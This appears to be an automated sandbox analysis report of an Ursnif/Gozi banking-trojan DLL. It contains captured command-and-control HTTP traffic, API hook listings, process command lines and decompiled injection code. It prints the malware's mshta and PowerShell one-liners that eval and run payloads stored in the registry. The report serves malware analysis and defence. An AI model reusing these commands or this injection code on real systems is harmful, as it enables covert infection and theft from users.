Feb 10, 2021 15:16:10.686885118 CET	6274	IN	Data Raw: 93 85 14 68 47 26 7c 67 39 3f 77 88 de d4 5c 18 30 d0 14 5e de 9a 6b e5 2c 48 b0 5e 3d e3 91 af 57 bc 3d 16 94 7d 2f 2b 88 f1 7d 3b eb e7 ad 0a 9a b3 3e 5a 07 af 45 8e 04 22 7d a2 2c 36 e1 36 62 6f d9 1c 0a bb 93 98 d7 d2 b7 80 73 e6 03 40 9d 41 Data Ascii: hG&\|g9?w\0^k,H^=W=}/+};>ZE"},66bos@AP>}U$2JgNc0eWm\|b^t]}_cI>RUM\B=6mLU#H_*tfx4l?cCFI="4<[@HErLp

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.7	49763	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2021 15:16:14.566945076 CET	6405	OUT	GET /api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Feb 10, 2021 15:16:15.167987108 CET	6405	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 10 Feb 2021 14:16:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.7	49764	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2021 15:16:16.592622042 CET	6407	OUT	POST /api1/6znaROjfA7hFvImt7kRBj/d8oBlDeaiTpDTw3m/IBQAbTPMeELrV0F/eBc8XtKIPlaG2wOk3_/2FzWsO07N/QVPbwJwjwuG0x_2Bmgtb/T2QshS_2F9rl28gdKaK/ObX5241N6Yuhqoe_2Bb_2F/v7SApCdjSpVoH/vIUqUnsJ/WVeez27cvHmK85aDLttDAUk/ChK5ibvdbq/6hwDFc02b_2F096iz/u_2BBs0hOK08/GFHq_2B8sNe/xc8KOXJRGK_2BT/23ua6L_2BsKd5NwAEGyWZ/BrR5nO2eoCoLivkJ/HCF96ydzEoPKQbD/PpBNddo_2FoZtXcrSVB6/q HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Content-Length: 2 Host: api3.lepini.at
Feb 10, 2021 15:16:16.592643976 CET	6407	OUT	Data Raw: 0d 0a Data Ascii:
Feb 10, 2021 15:16:17.122422934 CET	6408	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 10 Feb 2021 14:16:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 37 62 0d 0a 72 94 b0 e6 20 99 d9 c1 8b 7d bf 98 47 52 33 23 51 62 cf eb 24 68 ea a0 46 9a 17 5c ab 14 a9 ca dc a0 dd e5 14 e0 dc ed 24 8a 0f 73 20 66 43 9b 6d e8 27 5a f1 9c 4b 2e b5 90 af 26 f6 2b 59 2f bd c3 77 23 3c 6f e3 63 f3 55 51 37 29 b1 91 0b 92 d5 ef 12 0e f1 51 f9 6c 4f 1d 55 7c 6e 5b 1c ae 27 25 23 62 c4 35 75 3d 5c ac fc dd 09 68 4b 57 27 06 5d 31 21 f2 d4 8c 64 67 0d 0a 30 0d 0a 0d 0a Data Ascii: 7br }GR3#Qb$hF\$s fCm'ZK.&+Y/w#<ocUQ7)QlOU\|n['%#b5u=\hKW']1!dg0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.7	49765	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 10, 2021 15:16:17.264029980 CET	6409	OUT	GET /api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Host: api3.lepini.at
Feb 10, 2021 15:16:17.623415947 CET	6409	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 10 Feb 2021 14:16:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFFAC2D5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5B9C590

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFFAC2D521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFFAC2D5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFFAC2D520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFFAC2D5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5B9C590

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6720 Parent PID: 5636

General

Start time:	15:13:54
Start date:	10/02/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll'
Imagebase:	0x1040000
File size:	121856 bytes
MD5 hash:	99D621E00EFC0B8F396F38D5555EB078
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 6524 Parent PID: 6720

General

Start time:	15:14:29
Start date:	10/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
Imagebase:	0xfd0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6360 Parent PID: 6720

General

Start time:	15:14:32
Start date:	10/02/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put
Imagebase:	0x11a0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SpeechRuntime.exe PID: 5704 Parent PID: 792

General

Start time:	15:15:09
Start date:	10/02/2021
Path:	C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
Imagebase:	0x7ff675840000
File size:	223744 bytes
MD5 hash:	91858001E25FE5FF6E1C650BB4F24AB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 7068 Parent PID: 792

General

Start time:	15:15:37
Start date:	10/02/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff746810000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 5124 Parent PID: 7068

General

Start time:	15:15:37
Start date:	10/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2
Imagebase:	0xaf0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 7084 Parent PID: 7068

General

Start time:	15:15:42
Start date:	10/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2
Imagebase:	0xaf0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 608 Parent PID: 7068

General

Start time:	15:15:46
Start date:	10/02/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2
Imagebase:	0xaf0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: mshta.exe PID: 5872 Parent PID: 3292

General

Start time:	15:15:53
Start date:	10/02/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Imagebase:	0x7ff749550000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 7048 Parent PID: 5872

General

Start time:	15:15:55
Start date:	10/02/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase:	0x7ff7ed8f0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, Author: Joe Security Rule: GoziRule, Description: Win32.Gozi, Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, Author: CCN-CERT
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6720 Parent PID: 5636 loaddll32.exeCOMMON

Executed Functions

Function 6D8E1000, Relevance: 24.1, APIs: 16, Instructions: 126
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6D8E1000(intOrPtr _a4) {
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				long _v60;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				void* _t28;
				long _t31;
				long _t32;
				void* _t41;
				intOrPtr _t43;
				long _t48;
				intOrPtr _t49;
				signed int _t50;
				void* _t57;
				signed int _t61;
				void* _t63;
				intOrPtr* _t64;

				_t21 = E6D8E166F();
				_v52 = _t21;
				if(_t21 != 0) {
					L21:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t50 = 9;
					_t61 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t50;
					_t26 = E6D8E18B4(0, _t61); // executed
					_v56 = _t26;
					Sleep(_t61 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L21;
				}
				_t27 = E6D8E15F2(_t50); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L19:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L21;
				}
				if(_a4 != 0) {
					L11:
					_t28 = CreateThread(0, 0, __imp__SleepEx,  *0x6d8e414c, 0, 0); // executed
					_t63 = _t28;
					if(_t63 == 0) {
						L18:
						_v56 = GetLastError();
						goto L19;
					}
					_t31 = QueueUserAPC(E6D8E116E, _t63,  &(_v44.wSecond)); // executed
					if(_t31 == 0) {
						_t48 = GetLastError();
						TerminateThread(_t63, _t48);
						CloseHandle(_t63);
						_t63 = 0;
						SetLastError(_t48);
					}
					if(_t63 == 0) {
						goto L18;
					} else {
						_t32 = WaitForSingleObject(_t63, 0xffffffff);
						_v60 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t63,  &_v60); // executed
						}
						CloseHandle(_t63);
						goto L19;
					}
				}
				if(E6D8E1B50(_t50,  &_v48) != 0) {
					 *0x6d8e4138 = 0;
					goto L11;
				}
				_t49 = _v48;
				_t64 = __imp__GetLongPathNameW;
				_t41 =  *_t64(_t49, 0, 0); // executed
				_t57 = _t41;
				if(_t57 == 0) {
					L9:
					 *0x6d8e4138 = _t49;
					goto L11;
				}
				_t15 = _t57 + 2; // 0x2
				_t43 = E6D8E1BD2(_t57 + _t15);
				 *0x6d8e4138 = _t43;
				if(_t43 == 0) {
					goto L9;
				}
				 *_t64(_t49, _t43, _t57); // executed
				E6D8E19CF(_t49);
				goto L11;
			}

0x6d8e100c
0x6d8e1015
0x6d8e1019
0x6d8e115f
0x6d8e1165
0x00000000
0x00000000
0x00000000
0x6d8e101f
0x6d8e101f
0x6d8e1024
0x6d8e102a
0x6d8e1039
0x6d8e103a
0x6d8e103d
0x6d8e1040
0x6d8e1049
0x6d8e104d
0x6d8e1053
0x6d8e1057
0x6d8e105e
0x00000000
0x00000000
0x6d8e1064
0x6d8e106b
0x6d8e106f
0x6d8e1150
0x6d8e1150
0x6d8e1157
0x6d8e1159
0x6d8e1159
0x00000000
0x6d8e1157
0x6d8e1078
0x6d8e10cb
0x6d8e10dd
0x6d8e10e3
0x6d8e10e7
0x6d8e1146
0x6d8e114c
0x00000000
0x6d8e114c
0x6d8e10f4
0x6d8e1102
0x6d8e110a
0x6d8e110e
0x6d8e1115
0x6d8e1118
0x6d8e111a
0x6d8e111a
0x6d8e1122
0x00000000
0x6d8e1124
0x6d8e1127
0x6d8e112f
0x6d8e1133
0x6d8e113b
0x6d8e113b
0x6d8e1142
0x00000000
0x6d8e1142
0x6d8e1122
0x6d8e1086
0x6d8e10c5
0x00000000
0x6d8e10c5
0x6d8e1088
0x6d8e108c
0x6d8e1095
0x6d8e1097
0x6d8e109b
0x6d8e10bd
0x6d8e10bd
0x00000000
0x6d8e10bd
0x6d8e109d
0x6d8e10a2
0x6d8e10a9
0x6d8e10ae
0x00000000
0x00000000
0x6d8e10b3
0x6d8e10b6
0x00000000

APIs

Part of subcall function 6D8E166F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,6D8E1011), ref: 6D8E167E
Part of subcall function 6D8E166F: GetVersion.KERNEL32(?,6D8E1011), ref: 6D8E168D
Part of subcall function 6D8E166F: GetCurrentProcessId.KERNEL32(?,6D8E1011), ref: 6D8E169C
Part of subcall function 6D8E166F: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,6D8E1011), ref: 6D8E16B5

GetSystemTime.KERNEL32(?), ref: 6D8E1024
SwitchToThread.KERNEL32 ref: 6D8E102A

Part of subcall function 6D8E18B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00000000,?,00000000,?,?,?,?,?,?,6D8E1045,00000000), ref: 6D8E190A
Part of subcall function 6D8E18B4: memcpy.NTDLL(?,6D8E1045,?,?,00000000,?,00000000,?,?,?,?,?,?,6D8E1045,00000000), ref: 6D8E199C
Part of subcall function 6D8E18B4: VirtualFree.KERNELBASE(6D8E1045,00000000,00008000,?,00000000,?,00000000,?,?,?,?,?,?,6D8E1045,00000000), ref: 6D8E19B7

Sleep.KERNELBASE(00000000,00000000), ref: 6D8E104D
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6D8E1095
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6D8E10B3
CreateThread.KERNEL32 ref: 6D8E10DD
QueueUserAPC.KERNELBASE(6D8E116E,00000000,?), ref: 6D8E10F4
GetLastError.KERNEL32 ref: 6D8E1104
TerminateThread.KERNEL32(00000000,00000000), ref: 6D8E110E
CloseHandle.KERNEL32(00000000), ref: 6D8E1115
SetLastError.KERNEL32(00000000), ref: 6D8E111A
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6D8E1127
GetExitCodeThread.KERNELBASE(00000000,?), ref: 6D8E113B
CloseHandle.KERNEL32(00000000), ref: 6D8E1142
GetLastError.KERNEL32 ref: 6D8E1146
GetLastError.KERNEL32 ref: 6D8E1159

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
String ID:
API String ID: 2478182988-0
Opcode ID: 4cf5f9529abe05384c97b3a8aa7565abadcbdc80ecf25e1fd1d9bcb7029290f3
Instruction ID: 6577ee06cb65035f2028f9c1b5d4d105b9930fdb75accd15a47c8d0951b91589
Opcode Fuzzy Hash: 4cf5f9529abe05384c97b3a8aa7565abadcbdc80ecf25e1fd1d9bcb7029290f3
Instruction Fuzzy Hash: ED415371508652ABC711DF658C8CE6FBBBDEA8B795B110E19F925C2150E734CD04CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D9525FE, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000A0B,00003000,00000040,00000A0B,6D952058), ref: 6D9526B8
VirtualAlloc.KERNEL32(00000000,00000122,00003000,00000040,6D9520B7), ref: 6D9526EF
VirtualAlloc.KERNEL32(00000000,000106EF,00003000,00000040), ref: 6D95274F
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D952785
VirtualProtect.KERNEL32(6D8E0000,00000000,00000004,6D9525DD), ref: 6D95288A
VirtualProtect.KERNEL32(6D8E0000,00001000,00000004,6D9525DD), ref: 6D9528B1
VirtualProtect.KERNEL32(00000000,?,00000002,6D9525DD), ref: 6D95297E
VirtualProtect.KERNEL32(00000000,?,00000002,6D9525DD,?), ref: 6D9529D4
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D9529F0

Memory Dump Source

Source File: 00000001.00000002.638237289.000000006D952000.00000040.00020000.sdmp, Offset: 6D952000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: b812c53be6b6bea8a3b00ee9b2b24d4aee26b3354c58aa391118a05591be0141
Instruction ID: 584ba685ad1254aab9be5aa3c06b38d7504766da198fd0b38f6d9c700fc3487e
Opcode Fuzzy Hash: b812c53be6b6bea8a3b00ee9b2b24d4aee26b3354c58aa391118a05591be0141
Instruction Fuzzy Hash: FBD14976602201DFEB25CF54C880B5677A6BF48310B1949A5EE1D9F75AD7B0BC30CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E1C22, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6D8E1C22(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6D8E1AD1(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x6d8e1c2b
0x6d8e1c32
0x6d8e1c33
0x6d8e1c34
0x6d8e1c35
0x6d8e1c36
0x6d8e1c47
0x6d8e1c4b
0x6d8e1c5f
0x6d8e1c62
0x6d8e1c65
0x6d8e1c6c
0x6d8e1c6f
0x6d8e1c76
0x6d8e1c79
0x6d8e1c7c
0x6d8e1c7f
0x6d8e1c84
0x6d8e1cbf
0x6d8e1c86
0x6d8e1c89
0x6d8e1c8f
0x6d8e1c94
0x6d8e1c98
0x6d8e1cb6
0x6d8e1c9a
0x6d8e1ca1
0x6d8e1caf
0x6d8e1caf
0x6d8e1c98
0x6d8e1cc7

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,76D24EE0,00000000,00000000,00000002), ref: 6D8E1C7F

Part of subcall function 6D8E1AD1: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6D8E1C94,00000002,00000000,?,?,00000000,?,?,6D8E1C94,?), ref: 6D8E1AFE

memset.NTDLL ref: 6D8E1CA1

Strings

@, xrefs: 6D8E1C6F

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a4b2d7ccb7a4b4173cfa15131034b09751e21d49243ad00eb51d5121aa156739
Instruction ID: 047e1f773688569f02b50d618c6e9d3efb104f95723458e1a4ab2f777dbc3aac
Opcode Fuzzy Hash: a4b2d7ccb7a4b4173cfa15131034b09751e21d49243ad00eb51d5121aa156739
Instruction Fuzzy Hash: 3B21F9B1D00209AFDB01CFA9C8849DEFBB9FB49354F108969E616F3210D7309A459FA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D8E1B13, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6D8E1B13(void* __ecx) {
				char _v8;
				signed short _t7;

				_v8 = _v8 & 0x00000000;
				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
				if(_t7 == 0) {
					__imp__GetSystemDefaultUILanguage();
					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
				}
				return _v8;
			}

0x6d8e1b17
0x6d8e1b28
0x6d8e1b30
0x6d8e1b32
0x6d8e1b45
0x6d8e1b45
0x6d8e1b4f

APIs

GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6D8E163E,?,?,?,00000000,00000000,?,?,?,6D8E1069), ref: 6D8E1B28
GetSystemDefaultUILanguage.KERNEL32(?,?,6D8E163E,?,?,?,00000000,00000000,?,?,?,6D8E1069), ref: 6D8E1B32
VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6D8E163E,?,?,?,00000000,00000000,?,?,?,6D8E1069), ref: 6D8E1B45

Memory Dump Source

Source File: 00000001.00000002.637913897.000000006D8E1000.00000020.00020000.sdmp, Offset: 6D8E0000, based on PE: true

Associated: 00000001.00000002.637887859.000000006D8E0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637944670.000000006D8E3000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.637966624.000000006D8E5000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.637992816.000000006D8E6000.00000002.00020000.sdmp Download File

Similarity

API ID: Language$DefaultInfoLocaleNameSystem
String ID:
API String ID: 3724080410-0
Opcode ID: bee770ef05a63fa621d4cd26b620fe57541101132e5a5204344a639cc22fd299
Instruction ID: c13d4cf55e3ab4a666cfdbe9fd304c70aed80f0321c57658c99a09fac5f4b4b9
Opcode Fuzzy Hash: bee770ef05a63fa621d4cd26b620fe57541101132e5a5204344a639cc22fd299
